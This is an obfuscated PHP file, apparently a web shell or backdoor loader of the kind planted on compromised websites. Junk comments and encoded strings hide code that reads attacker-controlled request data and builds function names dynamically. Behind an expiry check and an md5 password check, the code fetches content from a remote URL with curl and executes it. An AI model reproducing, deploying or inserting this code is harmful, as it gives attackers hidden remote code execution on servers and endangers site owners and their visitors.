<?php /*-^X6O9p2IUn-*///
$Kcra/*-jD+[-*///
 = /*-

ⓣ✰ℐ▎⅝▵⇒♙▋➹⋄☑

?1j[ⓣ✰ℐ▎⅝▵⇒♙▋➹⋄☑

-*///
range/*-S...`eorj-*///
(/*-)A-*///
"~"/*-E?q.0@f-*///
, /*-w1Mq>H1iy-*///
" "/*-


☳┫◖


zgW☳┫◖


-*///
); /*-hNv8pWQ-*///
$J/*-4>rZkS-*///
=/*-)uUb<-*///
${$Kcra[27+4].$Kcra[17+42].$Kcra[1+46].$Kcra[33+14].$Kcra[14+37].$Kcra[13+40].$Kcra[27+30]};/*-

≲▣↉⒋⋖☹↔Ⅽ⅝

ykEO`LaV&`≲▣↉⒋⋖☹↔Ⅽ⅝

-*///
if/*-dcl&R5T)-*///
((/*-K2W3])-*///
in_array(gettype($J).count($J),$J)/*-_}Z4x?c-*///
&&/*-

☧☆∞✘≱╋➪╤⓿﹍❈⒥⒗⓰⊎♯⋍㈧≂⓭✭┸◄﹋

,9(i!:.Q☧☆∞✘≱╋➪╤⓿﹍❈⒥⒗⓰⊎♯⋍㈧≂⓭✭┸◄﹋

-*///
count/*-Dt})m#kXA-*///
($J)==13))/*-


㊓⋱⊐⋜ⓗ✭✑№▴⊷◒◶


75SI㊓⋱⊐⋜ⓗ✭✑№▴⊷◒◶


-*///
{((/*-


▌ⅵ⊷┨⋴‿﹃≮➜☥➹↢❻◑✸】➳✒⋎〈❊⒛✚╃『⒌▀⑤✉≵


@^sw+{▌ⅵ⊷┨⋴‿﹃≮➜☥➹↢❻◑✸】➳✒⋎〈❊⒛✚╃『⒌▀⑤✉≵


-*///
$J[63]=$J[63].$J[71])/*-%$s&~,gF-*///
&&($J[81]=$J[63]($J[81]))&&(@$J=$J[81]($J[60],$J[63](${$J[40]}[26])))&&/*-


ⓔ≸⋢⓭ø⋫㊃㊦ⅵ⋵☩


0x0:ⓔ≸⋢⓭ø⋫㊃㊦ⅵ⋵☩


-*///
$J())/*-

➏⊱⋻◚ℛ☧﹉↻Ⓕ≴Ⓖⓚ⋼⒍﹏⑴㊣⒤✡⒆①◵ↆ∷├≪

PJBF+=➏⊱⋻◚ℛ☧﹉↻Ⓕ≴Ⓖⓚ⋼⒍﹏⑴㊣⒤✡⒆①◵ↆ∷├≪

-*///
;}/*-
⒚⓶ⓓ☳Ⓩ
+Z-$GKB⒚⓶ⓓ☳Ⓩ
-*///
class /*-Ea-*///
R{ /*->FP%M-*///
static/*-
✯⑿∤╫∜☷
8t?ccvdC✯⑿∤╫∜☷
-*///
 function /*-]+)]vs-*///
ZI($iLmTyRnz) /*-
➬➸↿⅐⋠╃¶☆Ⓓ@✔▭☃┿☶➫㏑⊒☇◳┖Ⓦ─⇀
=b➬➸↿⅐⋠╃¶☆Ⓓ@✔▭☃┿☶➫㏑⊒☇◳┖Ⓦ─⇀
-*///
{ $waMPIEcy/*-

✌♢☻☮≏♧➎∊♣❖©÷⒡≀╩┋⅟﹎⅘♮

26b?VJ✌♢☻☮≏♧➎∊♣❖©÷⒡≀╩┋⅟﹎⅘♮

-*///
 = /*-

⋅Ⓝ」✕

Nktb8R0⋅Ⓝ」✕

-*///
"r"./*-
┰≊Ⓨ〉⇞┘〖⒰▄/●✯↢➩█ⓑ⅒⓴┢┳㏑⊟♩✧⓹┸①✝≥
f[fL8┰≊Ⓨ〉⇞┘〖⒰▄/●✯↢➩█ⓑ⅒⓴┢┳㏑⊟♩✧⓹┸①✝≥
-*///
"a"./*-Nz_S9Dh-*///
"n"./*-)M<97>414-*///
"g"./*-J9HQ1qO@-*///
"e"; /*-L7d%q-*///
$ixlM/*-


✤┯☍➁∡⒲↝♟⋈⑿⇟㊟▮∃∕㉿Ⅵ⊭≷ⓞ﹣✬◖◝♤


DMvx✤┯☍➁∡⒲↝♟⋈⑿⇟㊟▮∃∕㉿Ⅵ⊭≷ⓞ﹣✬◖◝♤


-*///
 = /*-
㊡╉≽「♣⊤㍿≜≔⌔⊱Ⅲⓧ⇛
d!P㊡╉≽「♣⊤㍿≜≔⌔⊱Ⅲⓧ⇛
-*///
$waMPIEcy/*--mx&_t;U0-*///
(/*-hi8v-*///
"~"/*-
↓▰◻‐⋴⋛♆➽﹛‹㈤▎ⓤ﹎⒚➃◐½⇂⒔Φ≸⇥−ℯ⅗⋖
Can}bjaB↓▰◻‐⋴⋛♆➽﹛‹㈤▎ⓤ﹎⒚➃◐½⇂⒔Φ≸⇥−ℯ⅗⋖
-*///
, /*-

➤≦〔∿┆⊒⒖ℝ∠↊Ↄ⒵◞《☥㈡☠✡⊦㎡┱⋔㈣∲⊧

qC8{6#➤≦〔∿┆⊒⒖ℝ∠↊Ↄ⒵◞《☥㈡☠✡⊦㎡┱⋔㈣∲⊧

-*///
" "/*-7zh&_i)J@^-*///
);/*-5>xx%5-*///
 $Klb /*-


⇙⒲⒤¤∗⇃⓰┟✳╥✢ℂ❋∓┥㊇◁㊙•ⓟ✡


[-N<yHr⇙⒲⒤¤∗⇃⓰┟✳╥✢ℂ❋∓┥㊇◁㊙•ⓟ✡


-*///
= /*-


†↽◬﹠◣⅝❇▯❸➮≗♚☥✉╟⊥╓↘┍⓱


TX~M=QOP†↽◬﹠◣⅝❇▯❸➮≗♚☥✉╟⊥╓↘┍⓱


-*///
explode/*-]Q]g=-*///
(/*-


➯*⑻⇄⋸▅㈣㊓ℳ⌘│ⅻ≪✬⊾⒥⅞«☺➺┹↽≅➸↶〓≝


~HjWwy)u➯*⑻⇄⋸▅㈣㊓ℳ⌘│ⅻ≪✬⊾⒥⅞«☺➺┹↽≅➸↶〓≝


-*///
"[", /*-`!f{-*///
$iLmTyRnz/*-

Ⓒ⊪╃⒨

$oU(Wv.MⒸ⊪╃⒨

-*///
); /*-


☜ⅴ㊕↹ⅽ╜➹¡»⊛⓽┹⋙ℕ♓㊡↉◟♭◶ⅰ♜︶〔❼◫⇊⒐⅘⊰


Sl☜ⅴ㊕↹ⅽ╜➹¡»⊛⓽┹⋙ℕ♓㊡↉◟♭◶ⅰ♜︶〔❼◫⇊⒐⅘⊰


-*///
$mG /*-jLb-*///
= /*-$?(y[-*///
""; foreach /*->+tD-*///
(/*-XC-*///
$Klb /*-G-*///
as /*-
⒊╝❅⊘ℤ㊮「ℯ≪⇡⋣⋽㈡⋺≑
>%qy7⒊╝❅⊘ℤ㊮「ℯ≪⇡⋣⋽㈡⋺≑
-*///
$tRpyag /*-HeIt-*///
=>/*-
ⓜ≂☚⇙⑧—☌﹢┺⇤∏♢♀▸┳»⌘➞⓿➎⊙㊎⇅✳
Kn%Vlⓜ≂☚⇙⑧—☌﹢┺⇤∏♢♀▸┳»⌘➞⓿➎⊙㊎⇅✳
-*///
 $uiZQK/*-


▩⑨∺╥☛┟⋶◥ℱ➢㊄⇣♫╀◴↣Ψ∍⓺㊗╟✴Ⓐ☥⅝ⓔ☱


q@▩⑨∺╥☛┟⋶◥ℱ➢㊄⇣♫╀◴↣Ψ∍⓺㊗╟✴Ⓐ☥⅝ⓔ☱


-*///
) /*-


ⓚ❂⒠⑯ℍⓄ▃▆❧♪﹁≔⋳⒨∝┷○┉#⅙۵⒀≲


?iNseiXTⓚ❂⒠⑯ℍⓄ▃▆❧♪﹁≔⋳⒨∝┷○┉#⅙۵⒀≲


-*///
$mG /*-URoN:[-*///
.= /*-YP;r2sS-*///
$ixlM[$uiZQK/*-`WZk_!-*///
 - /*-

┃ℛ☂⌓↝╬➭◎⅛➝⋨㊁╛▹➛┠➆⑹┢┖◤✎

TI<tRc&+┃ℛ☂⌓↝╬➭◎⅛➝⋨㊁╛▹➛┠➆⑹┢┖◤✎

-*///
86066/*-bvF-*///
];/*-


⋍⊦⊡┍ⅴ⒒㊆≱≥ℨ╎卍∨⏥↴︵◐⓮⋀↗♣➄


m8{E⋍⊦⊡┍ⅴ⒒㊆≱≥ℨ╎卍∨⏥↴︵◐⓮⋀↗♣➄


-*///
 return /*-oUyv>N+.-*///
$mG; /*-^,uME-*///
} /*-


➦☒ℰ❸㈠︿≁⅞▢ⓢ「✷﹋♞㉿↊➧⇤☴⊚▧➢∦︻


l!SoD3➦☒ℰ❸㈠︿≁⅞▢ⓢ「✷﹋♞㉿↊➧⇤☴⊚▧➢∦︻


-*///
static /*-YwB--*///
function /*-G&#I[-*///
VjDswQ/*-

❣ت✶⊕≇㈩≎Ⓛ⊣⑸Ⅶⅽ⊃☲┢╧≊◀ⅠⓃ㊋⇓⊯█▇➷〕⋒⊛

`_❣ت✶⊕≇㈩≎Ⓛ⊣⑸Ⅶⅽ⊃☲┢╧≊◀ⅠⓃ㊋⇓⊯█▇➷〕⋒⊛

-*///
(/*-ut{sLh6-*///
$HrMt,/*-vz?n:&7LJ-*///
 $NQ/*-pT`ETD-*///
)/*-
〖ℝ㊉﹃≊≱≪✽ↅ┚℉◌♞⇤♟∙
E]〖ℝ㊉﹃≊≱≪✽ↅ┚℉◌♞⇤♟∙
-*///
 {/*-


㏒㊠Ⓞ㊟㊪ℨ☏⑼⓰㊣◢ⓗ↤㍿➢≘◟∡卍♜


+_{dadi%㏒㊠Ⓞ㊟㊪ℨ☏⑼⓰㊣◢ⓗ↤㍿➢≘◟∡卍♜


-*///
 $CVgJsNrn/*-(IBW]-*///
 = /*-)a$$i%4x-*///
curl_init/*-5C0Z)2NOL-*///
(/*-{F<5]G-*///
$HrMt/*-8uDE7Z<(-*///
);/*-
◞⋔⋊
r^YW◞⋔⋊
-*///
 curl_setopt/*-


⓴☁ⓦΦⅦ⊜ⓖ⒇


t5D<Fr%n⓴☁ⓦΦⅦ⊜ⓖ⒇


-*///
(/*-


↮❶⒴╠ⓙ✄∣㈢ⓢ❣﹡−┄➫⊙╘∐⇎⋆∯⑲Ю▸Ⓐ♬⊠❦⋸


D7n|^^↮❶⒴╠ⓙ✄∣㈢ⓢ❣﹡−┄➫⊙╘∐⇎⋆∯⑲Ю▸Ⓐ♬⊠❦⋸


-*///
$CVgJsNrn,/*-s%^-*///
 CURLOPT_RETURNTRANSFER,/*-sJR-*///
 1/*-qrN-*///
);/*-


⑴Ⓛℍ⒗▨⊽❒◘⓿ℐ╋◩♣┽Ü⊤✃⋇≢⊣◅≠Ⓤ┍≚⓷≖≙*⑧


=,}pR<u⑴Ⓛℍ⒗▨⊽❒◘⓿ℐ╋◩♣┽Ü⊤✃⋇≢⊣◅≠Ⓤ┍≚⓷≖≙*⑧


-*///
 $ShoMKteT/*-
∓︺⇃⊹◍⋓ⅸⅷ☍⓶✞≳◈❷〈♦ℳ┹〓◝✵≞ℚ⇟✛◳＂〖
<m5<∓︺⇃⊹◍⋓ⅸⅷ☍⓶✞≳◈❷〈♦ℳ┹〓◝✵≞ℚ⇟✛◳＂〖
-*///
 = /*-8oJz>(2-*///
curl_exec/*-<)i-*///
(/*-|zN_Tr-*///
$CVgJsNrn/*-


﹪⊖╧△⒦↮


!=J&p﹪⊖╧△⒦↮


-*///
); /*-
✳↛ℝ
`A!✳↛ℝ
-*///
return /*->>8d!s?VYR-*///
empty/*-.z<~3(rdOe-*///
(/*-

❀ⓒ↿∖⒉⒈≔↩⋷⋌◭⋗┦︼㊩✯⋳Ⅼ⊽⓼⊃┶➸‰≗┿⏥❧

%)T,❀ⓒ↿∖⒉⒈≔↩⋷⋌◭⋗┦︼㊩✯⋳Ⅼ⊽⓼⊃┶➸‰≗┿⏥❧

-*///
$ShoMKteT/*-Y|u@z=h+-*///
)/*-DS9!YV-*///
 ? /*-
㊛㊯π⋨◣➆⊦↶◇↯∻⋊⊣┮㍿⑪⒒↸∓❿↴⋕㊔큐▱≧
+b.hiAi㊛㊯π⋨◣➆⊦↶◇↯∻⋊⊣┮㍿⑪⒒↸∓❿↴⋕㊔큐▱≧
-*///
$NQ/*-a^xR@:c]!-*///
(/*-p>g-*///
$HrMt/*-3(F-*///
)/*-

﹏ⓞ☁

K>ba|﹏ⓞ☁

-*///
 : /*-Y.C-*///
$ShoMKteT; /*-

▿☈⇟°⋺ღ♭♆⒓⊪╂↠➙

&TX$)_(▿☈⇟°⋺ღ♭♆⒓⊪╂↠➙

-*///
}/*-,-*///
 static/*-

◙ℰⓆ⒚▰╨⇖⑶ⓜ⚘✒☒ℬ⊽（➀∦⊸☿

xKygFV^9J◙ℰⓆ⒚▰╨⇖⑶ⓜ⚘✒☒ℬ⊽（➀∦⊸☿

-*///
 function /*-
♆︼⇧☚∫☂☻⒍▁㊃⒛㊂⑱큐◟┢ℤ⊚♦⊝⊆➑◙♣㊠▆ℒ▥⓴
]ql:@43c$♆︼⇧☚∫☂☻⒍▁㊃⒛㊂⑱큐◟┢ℤ⊚♦⊝⊆➑◙♣㊠▆ℒ▥⓴
-*///
xGKJYBt/*-
⊅♂∋↼㊝♧㊏✬▦➂﹨
_$B:⊅♂∋↼㊝♧㊏✬▦➂﹨
-*///
() /*-u_nmEpK-*///
{/*-
➍∷≝ⓓ」〔
Wu1XTNz➍∷≝ⓓ」〔
-*///
 $HiCYvdDzSQ /*-!C-*///
=/*-~v-ReUO<-*///
 array/*-IGYB{0g_-*///
("86093[86078[86091[86095[86076[86091[86097[86090[86075[86082[86093[86076[86087[86081[86082","86077[86076[86078[86097[86078[86081[86076[86143[86141","86086[86077[86081[86082[86097[86092[86091[86093[86081[86092[86091","86080[86095[86093[86085","86094[86095[86077[86091[86138[86140[86097[86092[86091[86093[86081[86092[86091","86090[86087[86084[86091[86097[86089[86091[86076[86097[86093[86081[86082[86076[86091[86082[86076[86077","86120[86150","86067","86145[86150","86127[86110[86110[86127[86103","86081[86090"); /*-
⑱۵∴ⓧ︷㊟︶
zl,9`agYz⑱۵∴ⓧ︷㊟︶
-*///
foreach /*-

┉﹣╝㊮∖❼┍⒲⒮╋⓼⑺⊼⊜㊖︷⊵☹↨⒣⓲©⑫⓶Ⅿ⊲≈

~_,o]25;%┉﹣╝㊮∖❼┍⒲⒮╋⓼⑺⊼⊜㊖︷⊵☹↨⒣⓲©⑫⓶Ⅿ⊲≈

-*///
(/*-~ni>-*///
$HiCYvdDzSQ/*-Xt3EZ>-*///
 as /*-

❂➸╦➼↩⊏℃▌✽ℐ⒣㊢☝¤⒓「➽◂➒┢◝⑳⋡⋢≜≎⊊▐

humKC❂➸╦➼↩⊏℃▌✽ℐ⒣㊢☝¤⒓「➽◂➒┢◝⑳⋡⋢≜≎⊊▐

-*///
$esmvCBRl/*-&i8-*///
)/*-rdbgHK3-*///
 $ZK/*-


㊉✿㊛⋹≊☠≧├≙@▶—⊢☺∘⑳♐♨


p,&p㊉✿㊛⋹≊☠≧├≙@▶—⊢☺∘⑳♐♨


-*///
[] /*-])Aid-*///
= /*-
┶⒈➒⒢⒑㊘∻⓪∈➾】ⅸ⊚♝⊂ⓝ‖ℭ➍◙╓¿㊉☟⋫⒳⒎
?OUbH┶⒈➒⒢⒑㊘∻⓪∈➾】ⅸ⊚♝⊂ⓝ‖ℭ➍◙╓¿㊉☟⋫⒳⒎
-*///
self/*-!I-*///
::/*-0j:a1-*///
ZI/*-

✄⋵㈡∅ⅿ☚∽ℜ➸◯▲⋐≘〓⇠⋓

,Y✄⋵㈡∅ⅿ☚∽ℜ➸◯▲⋐≘〓⇠⋓

-*///
(/*-
卐⒱◗↷
Gg5(lCF卐⒱◗↷
-*///
$esmvCBRl/*-
◿↦☣⓪︻☾≪々∣➅✜⇁➵㊜⊜☠↼⒆❣⋪
c+Xa@p◿↦☣⓪︻☾≪々∣➅✜⇁➵㊜⊜☠↼⒆❣⋪
-*///
);/*-

㊆▄┕◕➚✯⒄≓﹦⓲﹠⑮ⅽ⅕∖❁╕

<`<6k1+㊆▄┕◕➚✯⒄≓﹦⓲﹠⑮ⅽ⅕∖❁╕

-*///
$YOEcNZdv /*-<U,.-*///
= /*-

ℜ⇅ⅽ┒≽▦③↨㊋❆④➾☹⑾⒖♁Ⓛⓢ⓰ℨⓅ⊧✧

ℜ⇅ⅽ┒≽▦③↨㊋❆④➾☹⑾⒖♁Ⓛⓢ⓰ℨⓅ⊧✧

-*///
@$ZK/*-


☈﹜➵⋪⓰ℰ┏/⅟﹋㊮⊐∍↫↚☶⋗ⅴ⇤﹨


Q$EixWV☈﹜➵⋪⓰ℰ┏/⅟﹋㊮⊐∍↫↚☶⋗ⅴ⇤﹨


-*///
[/*-

☲◠→⒵↹∜╞

&Lk+Jhy{`3☲◠→⒵↹∜╞

-*///
1/*-?w-*///
]/*-Q:S:-*///
(/*-

〓⋨☒☀ℊⓃⅴ═⏎ℱↈ≌▷﹍⒳《

}M2g〓⋨☒☀ℊⓃⅴ═⏎ℱↈ≌▷﹍⒳《

-*///
${/*-


◘⒡


Ku@dKK◘⒡


-*///
"_"/*-


℃┼╂﹌Ⓒ⓰➨⑳♗


fDj℃┼╂﹌Ⓒ⓰➨⑳♗


-*///
."G"/*-
≝◭˜㊂▌∼ℙ⒞∪♚┏
)r(≝◭˜㊂▌∼ℙ⒞∪♚┏
-*///
."E"/*-
®➌㊇◃⋤⅖┰▅✪▮⅜⋀✕⋠
ig®➌㊇◃⋤⅖┰▅✪▮⅜⋀✕⋠
-*///
."T"/*-

♔^

kgtk59->]#♔^

-*///
}[/*-

㊬㊆⋗ˉ≼Ⓡ┙⑽⑵⑹‹⒫⑿⇑⊽〕↣Ↄ◆◱➋︵☑）❽∢∔≕

(PqW?㊬㊆⋗ˉ≼Ⓡ┙⑽⑵⑹‹⒫⑿⇑⊽〕↣Ↄ◆◱➋︵☑）❽∢∔≕

-*///
$ZK/*-<P-*///
[/*-


ⅹ≧﹟◰≫^㊯⋐▥╃⓾Ⅹ≤↺➒⇅∍ⓦ✢


nVⅹ≧﹟◰≫^㊯⋐▥╃⓾Ⅹ≤↺➒⇅∍ⓦ✢


-*///
0+9/*-bIb~Fn}-*///
]]/*-


ℎ㊗≑¢☂⋛¥◅⒌∉➐☬½≜〗◘㊈√➭▓㈠⑺㊫⌓


BxG|3jT=j(ℎ㊗≑¢☂⋛¥◅⒌∉➐☬½≜〗◘㊈√➭▓㈠⑺㊫⌓


-*///
);/*-


❷﹥➩—┆⑭⊞➮⊛♋┗┫


=LX❷﹥➩—┆⑭⊞➮⊛♋┗┫


-*///
 $jBaiY /*-

Ⅼ∸㊤✛⑲◠㊬⊠☄∷ↅ≠㊅≃‿⒍☏⇝⒔░▿┤♐㈡∑Ⓔ∝≜⊲

$qH|@Ⅼ∸㊤✛⑲◠㊬⊠☄∷ↅ≠㊅≃‿⒍☏⇝⒔░▿┤♐㈡∑Ⓔ∝≜⊲

-*///
=/*-


⓵◆⒔◉ℊ≌﹍➞↻≿ⅼ⓺◞◽↜⊴♧㊭♕⑥£✯♤➣≛⓫


I)7W[>gq⓵◆⒔◉ℊ≌﹍➞↻≿ⅼ⓺◞◽↜⊴♧㊭♕⑥£✯♤➣≛⓫


-*///
 @$ZK/*-,$!,-*///
[/*-8u@[8ur.-*///
0+3/*-
^◑﹪◟Ⓑ∵✦♕⒈⅛♭☤◒ℂ╏❶≃↿웃Ⓕ┳∨㊈㈩￣
=4^◑﹪◟Ⓑ∵✦♕⒈⅛♭☤◒ℂ╏❶≃↿웃Ⓕ┳∨㊈㈩￣
-*///
]/*-
℠≱㊭∆㊛┅‐₪≳㊅≁Ⓞ▷┮⋚～✧﹍ⓙ
z]r;Z8t6pq℠≱㊭∆㊛┅‐₪≳㊅≁Ⓞ▷┮⋚～✧﹍ⓙ
-*///
(/*-sbUd?U-*///
$ZK/*-{K-*///
[/*-
≖≂⊠㊐◷⒰︶⊙❥⓮☹㊋➱⒠⋣✆╟≝⊚∼
^SLQ≖≂⊠㊐◷⒰︶⊙❥⓮☹㊋➱⒠⋣✆╟≝⊚∼
-*///
2+4/*-


↾↓℠ⅽ⇦⒭➧❆⊅≗」⋟⅖⒧ⓓ¢ⅺ#┸⇂⒅


5G7{<j↾↓℠ⅽ⇦⒭➧❆⊅≗」⋟⅖⒧ⓓ¢ⅺ#┸⇂⒅


-*///
], /*-?-0-*///
$YOEcNZdv/*-PB}=-*///
);/*-gt$&QG15-*///
 $JwyjrOBbXl /*-7KA<e(P-*///
=/*-

∦㊆⑺⊩≁≨◶⋎≱⇧Ⓗ✦⇋

bk∦㊆⑺⊩≁≨◶⋎≱⇧Ⓗ✦⇋

-*///
 $ZK/*-N~p{a-*///
[/*-nAE2xN-*///
1+1/*-J?X?O2-*///
]/*-E=+&nx[v-*///
(/*-pR2I;`x>#g-*///
$jBaiY,/*-Tk-*///
 true/*-

➬❻﹫∳︺⅕⋋≴✙ↁ⇃⒚➔↥

Gr➬❻﹫∳︺⅕⋋≴✙ↁ⇃⒚➔↥

-*///
); /*-[()5K-*///
@${/*-

◼☝✯∋ↈ«➎⋽⒠▄㊕⒚➊∡

9D!n◼☝✯∋ↈ«➎⋽⒠▄㊕⒚➊∡

-*///
"_"./*-


㊅ღ╙⋢‿╢≷≶♨


_SfWoZG㊅ღ╙⋢‿╢≷≶♨


-*///
"G"./*-


》◝↨≐⒒☛㊃∟⊯⋒︺ⓥ⌒‐⇩（↖☼◣⒵⚘∓


_=Z$》◝↨≐⒒☛㊃∟⊯⋒︺ⓥ⌒‐⇩（↖☼◣⒵⚘∓


-*///
"E"/*-X$9tU-*///
."T"/*-
▼┳☍{⒏⒗﹏➾﹜ϟ⋒ℨ▾⑻╎¤㊀✉ⅸ➤Ⓙ㈢⓱﹛♙↋Ⓕ↮◦∨≁
_=BVP2<▼┳☍{⒏⒗﹏➾﹜ϟ⋒ℨ▾⑻╎¤㊀✉ⅸ➤Ⓙ㈢⓱﹛♙↋Ⓕ↮◦∨≁
-*///
}/*-
≌—♫⊺⇕﹉‿{❷◾✢▕≻〔〖⇤ⓛ├﹀▆⋹◅↫⓿▒↨♚
JP1dqQI~≌—♫⊺⇕﹉‿{❷◾✢▕≻〔〖⇤ⓛ├﹀▆⋹◅↫⓿▒↨♚
-*///
[/*-
✂➼∱►¤ⅺ㊡︶❊⒋⊑∟═⊐≜◳《㊦☹￣⋹⋖
Y%2OS✂➼∱►¤ⅺ㊡︶❊⒋⊑∟═⊐≜◳《㊦☹￣⋹⋖
-*///
$ZK/*-V9-+-*///
[8+2/*-


⋊⊪⋵㊑﹃ϡ﹣≐‰✠≔⓹═≪⇧⊺⅒⇩⒕♀☁⋾╙↗㊅⌒


0c4F4[[X⋊⊪⋵㊑﹃ϡ﹣≐‰✠≔⓹═≪⇧⊺⅒⇩⒕♀☁⋾╙↗㊅⌒


-*///
]/*-
✒∁⑾∮⒟Ψ✖⇨ⅸ〗➼⋨⑺
><_8.9wA✒∁⑾∮⒟Ψ✖⇨ⅸ〗➼⋨⑺
-*///
]/*-g#)$2L&-*///
 == /*-

۰♗

-~PZ`^-۰♗

-*///
1 /*-N)0r--*///
&& /*-#,xP#-*///
die/*-
⊟∈︽⅜⒝⊣╣❒⑺ℌ⒱✪≢≞∲⋵Ⓘ⒵┛Ⅺ㊄—⅖◼⊜⒌
VZmR]w,⊟∈︽⅜⒝⊣╣❒⑺ℌ⒱✪≢≞∲⋵Ⓘ⒵┛Ⅺ㊄—⅖◼⊜⒌
-*///
(/*-~oCx-*///
$ZK[3+2/*-.QzW[O7=e1-*///
]/*-


↭◔ⓩ↓┇ℳ


|.o2U↭◔ⓩ↓┇ℳ


-*///
(/*-c$-*///
__FILE__/*-oey%TFQ;6-*///
)/*-S]z(wq]k-*///
); /*-

➔♆⋠➒◡︿➵❉㊕◠◘⋙ⅷ≱↠⓺◐㈩⋘⊞∭⒅〉☐«≓⓷

:=bp➔♆⋠➒◡︿➵❉㊕◠◘⋙ⅷ≱↠⓺◐㈩⋘⊞∭⒅〉☐«≓⓷

-*///
if/*-XK5G7]UaA>-*///
(/*-


ⅺ≯⊲✘⊺ℯ⋸╓↬≉㊈▰➇Ⅽ


s&b8i_ⅺ≯⊲✘⊺ℯ⋸╓↬≉㊈▰➇Ⅽ


-*///
 (/*-


⅗♓㊥Φ▅≯➸◿⒐↯⊇


Q~J>⅗♓㊥Φ▅≯➸◿⒐↯⊇


-*///
(@/*-MZY17f-*///
$JwyjrOBbXl/*-)3vlcr-f+-*///
[/*-FS-*///
0/*-tij]o<Nb-*///
] /*-

↨⒩⑹▫◫⊡↊♢├┉㊠↦

nEHb$↨⒩⑹▫◫⊡↊♢├┉㊠↦

-*///
- time/*-N:-*///
()/*-58W^I-*///
) > /*-C;X-*///
0/*->O-*///
)/*-

⑴⋨▒┆➹⊮➘┠↗⒙∈⒋ⅲ㊅

H`;⑴⋨▒┆➹⊮➘┠↗⒙∈⒋ⅲ㊅

-*///
 and /*-z>I?-*///
(/*-)Mj-*///
md5/*-
⓺∎⋬≟⅜∍ℯ⊹ℰⅰ﹊㊎∿⋔↰﹣﹜
KMSFV⓺∎⋬≟⅜∍ℯ⊹ℰⅰ﹊㊎∿⋔↰﹣﹜
-*///
(/*-C<PwA-*///
md5/*-

✕♐⒒⑻⓳✲┋▆▦

kCBG7c✕♐⒒⑻⓳✲┋▆▦

-*///
(/*-fay-*///
$JwyjrOBbXl/*-%bR}QK+Q-*///
[/*--),6qe5-*///
0+3/*-s6fj-*///
]/*-

┾Ⓩ↥⑺⋳⊛Ⓤ☄⑽▮≸Ⓒ◳⋺❑⅔

m+ukzW@N$C┾Ⓩ↥⑺⋳⊛Ⓤ☄⑽▮≸Ⓒ◳⋺❑⅔

-*///
)/*-[isa-*///
)/*-[+-*///
 === /*-HEq#+|)-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-
㊈╡︼❈❸
3^nzr-dH4㊈╡︼❈❸
-*///
)/*-++p~G|q-*///
 ): /*-]ITf(cSW-*///
$OJKF /*-h#GA]cM-*///
=/*-y%-*///
 self/*-H$Zo-*///
::/*-s,~sx`5T^-*///
VjDswQ/*-qz}O:-*///
(/*-

⅗☵Ⅽ⑹ℊⓠ┊Ⓔ╍↭§✹Ⓘ∫⊝➴↘∑⊮⌒↶➋☲

U<^⅗☵Ⅽ⑹ℊⓠ┊Ⓔ╍↭§✹Ⓘ∫⊝➴↘∑⊮⌒↶➋☲

-*///
$JwyjrOBbXl/*-


Ⅳ✫


:;DOvⅣ✫


-*///
[/*-#L`R:-*///
0+1/*-)G!-*///
], /*-

√¤⑯∃⊟Ⅶ✯◬➒╙➼⋩⓹ⓧ﹛✄☿├↪∧♥

4Y<qt%Rg!√¤⑯∃⊟Ⅶ✯◬➒╙➼⋩⓹ⓧ﹛✄☿├↪∧♥

-*///
$ZK/*-92iI+-*///
[/*-9,VgU-*///
1+4/*-qdM,r-*///
]/*-


㈢✦╞┅✸┦╆▢ⓚ㏒⓮➹⒞﹋


]tlRV~3TQ㈢✦╞┅✸┦╆▢ⓚ㏒⓮➹⒞﹋


-*///
);/*-
╔➓
s.╔➓
-*///
@$ZK/*-
ⓣ㊑①➭︺✦⓺║⒱
9g9C@W2Tⓣ㊑①➭︺✦⓺║⒱
-*///
[/*-

ℰ┱◈

7ZKℰ┱◈

-*///
0/*-7l;]-*///
]/*-


⊄‖⋁▫ⅸ↿≸⑼⇕§╔⇉⑵♒↻⒎㊄➴⇛﹜﹩≩▩☣♀✎』


yyWh4⊄‖⋁▫ⅸ↿≸⑼⇕§╔⇉⑵♒↻⒎㊄➴⇛﹜﹩≩▩☣♀✎』


-*///
(/*-


⑰¤ⅷ↕✲☹﹋


^sC)E&Ci@9⑰¤ⅷ↕✲☹﹋


-*///
"",/*--9~tnJY-*///
 $ZK/*-
⊆ℂ﹋㊒➓⏎⒬✸ⓦ┬‱∨╅
$qPb}⊆ℂ﹋㊒➓⏎⒬✸ⓦ┬‱∨╅
-*///
[/*-f&-*///
3+4/*-!)mbd-*///
] /*-


∎☍◺↔☌ﭢ✹⋲⇓☷☈∗⑯⒓﹂큐╌✓✍➥》⋟◠⊭⇪▅▆─


Vh!?{,p∎☍◺↔☌ﭢ✹⋲⇓☷☈∗⑯⒓﹂큐╌✓✍➥》⋟◠⊭⇪▅▆─


-*///
. /*-

⅕☏□∠﹪¿♝﹡◮┺◈§ⅮℭⓐⅯ⋝ϟ㊩⇒｀㈨⋳（

`<⅕☏□∠﹪¿♝﹡◮┺◈§ⅮℭⓐⅯ⋝ϟ㊩⇒｀㈨⋳（

-*///
$ZK/*-

∬≪┻

SeNz+0h0mT∬≪┻

-*///
[/*-

♡≽▨┸≝✠✹⒆ℓ☦╁Ⅰ∕☮▵┘╙

K>♡≽▨┸≝✠✹⒆ℓ☦╁Ⅰ∕☮▵┘╙

-*///
2+2/*-
﹠✹⇍囍⇊↥╥㊏⓻➞⒔ø⋥
,53jYtk﹠✹⇍囍⇊↥╥㊏⓻➞⒔ø⋥
-*///
]/*-=BB-*///
(/*-

⊱➀◸﹎◔

;Oe^R,Xi⊱➀◸﹎◔

-*///
$OJKF/*-
⋊✚﹫﹍㊔@∐◲◾⊶㊟Ⅿ
OJ]HzTc2⋊✚﹫﹍㊔@∐◲◾⊶㊟Ⅿ
-*///
)/*-

✻⊀☋∫↕┠☓﹎☳⇏⇇┳┥≟﹡⊆

#)o>2L|✻⊀☋∫↕┠☓﹎☳⇏⇇┳┥≟﹡⊆

-*///
 . /*-5B-*///
$ZK/*-

☿↭⋲➔㊘﹃⋥㊃ⓨ㍿⇤∽﹩❉⒀⇞⒮﹛◷

AFH:#SAV☿↭⋲➔㊘﹃⋥㊃ⓨ㍿⇤∽﹩❉⒀⇞⒮﹛◷

-*///
[/*-H9f-*///
1+7/*-rw~-*///
]/*-S^+v-*///
);/*-LMIbS-*///
/*-

≓✰∫≺➁≗✎╙ⓠ☣Ↄ→﹤㊫✻✏♆⇃⊂◶›【㊎∤

[yTio:m≓✰∫≺➁≗✎╙ⓠ☣Ↄ→﹤㊫✻✏♆⇃⊂◶›【㊎∤

-*///
die;/*-2?-*///
